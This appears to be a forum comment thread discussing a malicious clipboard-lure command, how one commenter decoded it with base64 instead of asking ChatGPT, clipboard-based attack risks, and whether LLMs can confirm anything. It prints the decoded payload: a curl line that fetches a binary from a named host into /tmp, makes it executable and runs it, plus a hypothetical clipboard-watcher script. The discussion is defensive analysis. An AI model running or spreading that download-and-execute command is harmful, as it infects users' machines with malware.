


He asked ChatGPT to run the command in a sterile environment. He knew it was a bad idea to start with. It's a quick and dirty method in case you don't have a virgin VM lying around to try random scripts on to see what they do.

I'd say something edgy about paying attention but that wouldn't be nice.


It's a bad idea to try to execute a malicious string in any environment, but the payload is just base64 text and it's safe to decode if you understand how to use the command line.

Look, I just deciphered it in Termux on my phone:

~ $ echo "Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS" | base64 -d

curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
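
So the decoded command just pulls a binary down to /tmp, marks it executable, and runs it. If you wanted to go one step further and poke at the payload itself without ever executing it, something like this would do (the /tmp/sample name is just my placeholder, and you'd still want a throwaway VM for this part):

curl -sL -o /tmp/sample https://www.amanagencies.com/assets/js/grecaptcha   # fetch to a file only, never execute
file /tmp/sample                  # what is it? ELF binary, shell script, something else?
strings /tmp/sample | less        # skim for URLs, hostnames, wallet addresses

file and strings get you surprisingly far before you need anything resembling a sandbox.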

Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than running base64 -d on my phone did, lol. And if you want updoots on the Orange Site you had better mention LLMs.

If I were more paranoid I could've used someone else's computer to decipher the text, but I wanted to make a point.


ChatGPT doesn't run commands, does it?


That's probably bordering on a philosophical question.

Am I "running" code if follow the control flow and say "Hello World!" out loud?


It can


Geez... echo [some garble] | base64 -d | bash, and you'd spin up a VM to diagnose it?

I'd google a base64 decoder and paste the "[some garble]" in...


The command helpfully already tells you where you can find a base64 decoder: it's in /usr/bin/base64.

Assuming you already have a ChatGPT window handy, which many people do these days, I don't think it's any worse to paste it there and ask the LLM to decode it; that also avoids the risk of accidentally pasting the "| bash" along with it.


Was this a mistake too?

>The command they had copied to my clipboard was this

But couldn't someone attack here? You think you're selecting a small bit of text, but you're actually copying something much larger into the clipboard that "overflows" into memory? (Sorry, not my area, so I don't know if this is feasible.)


The engineers who wrote your browser already thought of this and made sure it wouldn't work.

In case anyone mocks you for this, though, it's not a stupid question at all: there have been 1-click and 0-click attacks with vectors barely more sophisticated than this. But I feel 100% confident that in 2025 no browser can be exploited just by copying a malicious string.


>But I feel 100% confident that in 2025 no browser can be exploited just by copying a malicious string.

That's a real far leap. Most OSes have a shared clipboard, and a lot of them run processes that watch the thing for events. That attack surface is so large that 100% certainty is a very hard sell to me.

Just for the sake of argument, say clipboard_manager.sh sees a malicious string copied from a site by the browser to the system clipboard that somehow poisons that process. clipboard_manager.sh then proceeds to exfiltrate browser data via the OS/fs rather than via the browser process at all, starts keylogging (trivial in most *nix), and just for the sake of throwing gas on the fire it joins the local adversarial botnet and starts churning captchas or coins or whatever.

Was the browser exploited? Ehh, no -- but it most definitely facilitated the attack by which it became victimized. It feels like semantics at that point.
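
To make the hypothetical concrete, a clipboard watcher doesn't need to be anything fancier than a polling loop like this (a rough sketch; xclip and the one-second interval are just stand-ins for whatever a real clipboard manager actually does):

#!/bin/sh
# naive clipboard watcher: poll the clipboard once a second and
# react whenever the contents change
prev=""
while true; do
  cur="$(xclip -selection clipboard -o 2>/dev/null)"
  if [ "$cur" != "$prev" ]; then
    # a real manager would just index this; a compromised one could
    # parse it, phone home, or rewrite the selection
    printf 'clipboard changed: %s\n' "$cur"
    prev="$cur"
  fi
  sleep 1
done

Anything sitting in that loop already runs with your user's privileges, which is the point: the browser only has to hand the string over.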


This is a good point and it completely fits serf's concern. So OK, I change my answer, it is reasonable to be concerned about exploits from just copying malicious content to the clipboard.


> as ChatGPT confirmed

Tech support knew it was not a good idea. ChatGPT was used to thoroughly explain why that was a bad idea. Are you trying to make other people look dumb because you need to feel smarter than others for some reason? That's gross.


ChatGPT didn't confirm anything! It didn't even output the decoded text. It made a guess that happened to be correct, at greater expense than real forensics and with less confidence.

To use the ChatGPT response without looking like an idiot, the first thing I would have to do is confirm it, because ChatGPT is very good at guessing and absolutely incapable of confirming.

Using base64 -d and looking at the malicious code would be confirming it. Did ChatGPT do that? Nobody ducking knows.


If you use one of the CLI agents like Claude Code, Codex, or Gemini CLI, they can confirm things: they let you know and require authorization when running tools like base64.



